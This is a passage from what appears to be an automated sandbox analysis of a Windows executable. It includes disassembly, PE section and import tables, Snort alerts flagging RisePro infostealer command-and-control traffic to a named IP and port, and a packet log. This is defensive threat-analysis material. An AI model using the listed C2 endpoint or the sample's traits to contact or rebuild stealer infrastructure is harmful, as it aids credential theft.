mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F2BE0D4D07Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F2BE0D4CD5Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F2BE0D4CD4Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F2BE0D4A64Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F2BE0D4CA21h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F2BE0D4A6D3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F2BE0D4A64Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x3210	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x25af0f	0x2830
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x3210	0x3400	d48e7247f38a85f4faf0976a465f5f2b	False	0.5991586538461539	data	5.441253023534783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0xfd6	0x1000	0bf4b100b1e345b3118e510f714ea574	False	0.73193359375	data	6.064612281278039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1001c0	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.6224572823433686
RT_ICON	0x102828	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8652482269503546
RT_DIALOG	0x102c90	0x100	data	English	United States	0.5234375
RT_DIALOG	0x102d90	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x102eb0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x102f10	0x22	data	English	United States	0.9411764705882353
RT_MANIFEST	0x102f38	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/28/24-19:53:15.750961	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	55333	3.36.173.8	192.168.2.4
06/28/24-19:53:52.881709	TCP	2049660	ET TROJAN RisePro CnC Activity (Outbound)	50500	55333	3.36.173.8	192.168.2.4
06/28/24-19:53:14.975494	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	55333	50500	192.168.2.4	3.36.173.8
06/28/24-19:53:22.922809	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	55333	50500	192.168.2.4	3.36.173.8
06/28/24-19:53:54.610472	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	55336	3.36.173.8	192.168.2.4
06/28/24-19:53:16.013390	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	50500	55333	3.36.173.8	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 28, 2024 19:53:14.960565090 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:14.965662003 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:14.965743065 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:14.975493908 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:14.980329990 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:15.750961065 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:15.797643900 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:16.013390064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:16.063273907 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:16.098817110 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.098850012 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.098898888 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.099841118 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.099854946 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.263480902 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:16.263751984 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:16.269510031 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:16.565207958 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.565295935 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.575532913 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.575551987 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.575767994 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.625807047 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.834922075 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.876547098 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.965415001 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.965519905 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.965598106 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.968194962 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.968216896 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.968226910 CEST	55334	443	192.168.2.4	34.117.186.192
Jun 28, 2024 19:53:16.968233109 CEST	443	55334	34.117.186.192	192.168.2.4
Jun 28, 2024 19:53:16.978436947 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:16.978466988 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:16.978530884 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:16.978844881 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:16.978859901 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.462039948 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.462096930 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.463597059 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.463603973 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.463833094 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.465488911 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.512502909 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.675585985 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.675682068 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.675744057 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.675889015 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.675901890 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.675910950 CEST	55335	443	192.168.2.4	172.67.75.166
Jun 28, 2024 19:53:17.675919056 CEST	443	55335	172.67.75.166	192.168.2.4
Jun 28, 2024 19:53:17.676301956 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:17.681054115 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.040009975 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.094624996 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:18.110371113 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:18.117400885 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.509793043 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.547739029 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:18.552850962 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.945203066 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:18.998475075 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:19.004087925 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:19.387031078 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:19.438309908 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:19.438410044 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:19.443376064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:19.799268007 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:19.844533920 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.262726068 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.267672062 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.270030975 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.274934053 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275038004 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275070906 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275077105 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275111914 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275124073 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275152922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275167942 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275204897 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275233984 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275260925 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275302887 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275315046 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275362968 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275368929 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275474072 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.275506020 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.275588036 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280073881 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280143023 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280188084 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280211926 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280292034 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280343056 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280353069 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280376911 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280427933 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280435085 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280458927 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280524015 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280524969 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280579090 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280582905 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280612946 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280642986 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280664921 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280693054 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.280695915 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.280749083 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.285232067 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.285345078 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.285640001 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.285692930 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.285762072 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.285799980 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.285881042 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.285953045 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286313057 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286343098 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286370993 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286398888 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286426067 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286462069 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286477089 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286504984 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286509037 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286524057 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286536932 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286561966 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286586046 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286590099 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.286616087 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.286669016 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290222883 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290290117 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290388107 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290452957 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290529966 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290556908 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290582895 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290591002 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290596962 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290643930 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290709019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290738106 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290759087 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290791035 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290796995 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290819883 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290846109 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290873051 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290880919 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290901899 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290930033 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290944099 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290957928 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.290958881 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290985107 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.290991068 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291013956 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291048050 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291049957 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291100025 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291100025 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291129112 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291157007 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291158915 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291187048 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291188955 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291212082 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291219950 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291237116 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291271925 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291372061 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291429996 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291455030 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291508913 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291523933 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291574001 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291590929 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291603088 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291625023 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291631937 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291660070 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291663885 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291692972 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291714907 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291778088 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291806936 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291837931 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291860104 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291861057 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291892052 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291915894 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291938066 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.291941881 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291971922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.291996956 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292021990 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292026997 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292052984 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292078018 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292104959 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292108059 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292139053 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292162895 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292171001 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292195082 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292221069 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292222023 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292252064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292273998 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292303085 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292308092 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292332888 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292360067 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292360067 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292377949 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292409897 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292429924 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292439938 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292464018 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292469025 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:22.292498112 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:22.292521000 CEST	55333	50500	192.168.2.4	3.36.173.8
